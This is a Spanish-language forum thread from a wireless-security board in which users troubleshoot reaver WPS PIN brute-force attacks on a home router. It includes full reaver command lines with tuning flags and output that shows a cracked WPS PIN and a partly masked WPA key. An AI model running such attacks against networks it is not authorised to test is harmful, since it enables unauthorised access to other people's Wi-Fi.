Seguridad Wireless - Wifi

Suite Seguridad Wireless => Live wifislax => Mensaje iniciado por: alein en 30-12-2013, 15:44 (Lunes)

Título: 4 primeros digitos del pin cambian por cada ataque realizado
Publicado por: alein en 30-12-2013, 15:44 (Lunes)
Hola, estoy experimentando reaver con el moden de la casa BHS Observa Telecom, de mac f8:c3:46:xX:XX:XX con reaver1.4, la primera vez que lo intente se me quedo al 99.99%, lei que se solucionada usando reavermod pero el problema es que aunque me carga hasta el 90 o mas, no consigo que me pase de m4, es decir nunca llega a m5 o m6, lo que segun yo los 4 digitos que me dio no son correctos por lo tanto no podria usar reavermod a menos que me quiera tardar meses, tambien cada vez que intento un ataque me da los 4 digitos diferentes la primera vez me dio 0238, la 2da0249, y ahora iba por 0352 y decidi pausar porque creo que algo anda mal. alguna sugerencia??.

el comando que uso es reaver -i mon0 -b f8:c3:46:xX:XX:XX -c 10 -a -v -S -x 2 -r 100:2 -l 2 -vv. wifislax4.7.2

pd: si esto no va aqui por favor que lo muevan o me digan donde colocarlo. gracias
Título: Re: 4 primeros digitos del pin cambian por cada ataque realizado
Publicado por: piruja_x en 31-12-2013, 00:18 (Martes)
Amigo prueba solo con estos comandos, anécdota:un día me paso que el cable del adaptador wfi estaba medio malo y perdía paquetes, justo estaba auditando una wps y lo que me paso es que me encontró los primeros 4 pero los que seguían no, pase el programa nuevamente para los últimos 4 y me paso lo mismo, para ver que pasaba verifique dmesg en la consola y mi sorpresa es que tenia muchos mensajes de error del adaptador wifi, recordé que le avía agregado una extensión de 3 MT mas al cable para tener mas comodidad y movilidad, lo probé con un multitester y resulta que estaba cortado, lo movía unos centímetros del adaptador y se desconectaba, lo repare y luego lance el mismo atraque con reaver normal y para mi sorpresa era el cable y pude encontrar el pin, lo otro es con los agregados de reaver, no me acuerdo mucho pero me dañaba el ataque y al finalizar reaver con ctrl+c seguía recibiendo nack.


reaver -i mon0 -b f8:c3:46:xX:XX:XX -c 10 -a -vv

reaver -i mon0 -b f8:c3:46:xX:XX:XX -c 10 -a -d 2 -t 3 -vv

 ;D espero tengas un feliz casi año nuevo y a toda la comunidad de wifislax igual.
Título: Re: 4 primeros digitos del pin cambian por cada ataque realizado
Publicado por: USUARIONUEVO en 31-12-2013, 01:00 (Martes)
tambien puedes probar añadiendo el parametro

-n

el cualen algunos routers da muy buen resultado al obligar a negociar los nack.

puede ser un pelin mas lento , pero mas seguro.

Título: Re: 4 primeros digitos del pin cambian por cada ataque realizado
Publicado por: alein en 31-12-2013, 06:32 (Martes)
hola, muchas gracias por su ayuda. me coloque a buscar el pin de mi router y lo probe completo en reaver y como era de esperarse lo ignoraba, luego le coloque el parametro -n y con ese me arrojo la contraseña de una vez, pero cuando lance el ataque sin el pin completo o sin el + el parametro -n el router me lo bloqueba, me salia error code 0x02 y entraba en un ciclo.

esto fue lo que sucedio:

reaver -i mon0 -b f8:c3:46:xxxxxx -c 1 -a -n -p01975086 -vv




reaver -i mon0 -b f8:c3:46:xxxxxx -c 1 -a -n -p0197 -vv

Switching mon0 to channel 1

y se repetia...

conclusion: aun sigue invulnerable el modem. alguna otra ayudita?
Título: Re: 4 primeros digitos del pin cambian por cada ataque realizado
Publicado por: alein en 31-12-2013, 15:12 (Martes)
hola, muchas gracias por su ayuda. me coloque a buscar el pin de mi router y lo probe completo en reaver y como era de esperarse lo ignoraba, luego le coloque el parametro -n y con ese me arrojo la contraseña de una vez, pero cuando lance el ataque sin el pin completo o sin el + el parametro -n el router me lo bloqueba, me salia error code 0x02 y entraba en un ciclo.

esto fue lo que sucedio:

reaver -i mon0 -b f8:c3:46:xxxxxx -c 1 -a -n -p01975086 -vv

  • Switching mon0 to channel 1
  • Waiting for beacon from F8:C3:46:xxxxxxxx
  • Associated with F8:C3:46:xxxxxxx (ESSID: xxxxxxxxxxxx)
  • Trying pin 01975086
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • Received M7 message
  • Sending WSC NACK
  • Sending WSC NACK
  • Pin cracked in 6 seconds
  • WPS PIN: '01975086'
  • WPA PSK: '009xxxxxxx'
  • AP SSID: 'xxxxxxxxx'
  • Nothing done, nothing to save.



reaver -i mon0 -b f8:c3:46:xxxxxx -c 1 -a -n -p0197 -vv

Switching mon0 to channel 1
  • Waiting for beacon from F8:C3:46:xxxxx
  • Associated with F8:C3:46:xxxxxx (ESSID: xxxxxxxx)
  • Trying pin 01975673
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 01975673

y se repetia...

conclusion: aun sigue invulnerable el modem. alguna otra ayudita?


Le coloque el parametro -t y eso me evito los errores 0x02 pero ahora me da 0x03


+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin